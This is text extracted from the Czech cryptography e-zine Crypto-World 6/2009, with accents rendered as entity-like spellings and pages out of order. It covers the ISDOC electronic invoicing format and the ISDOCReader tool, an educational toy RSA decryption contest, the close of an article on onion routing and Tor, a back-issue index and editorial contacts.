Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 11: Sešit 6/2009 (452 kB)

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

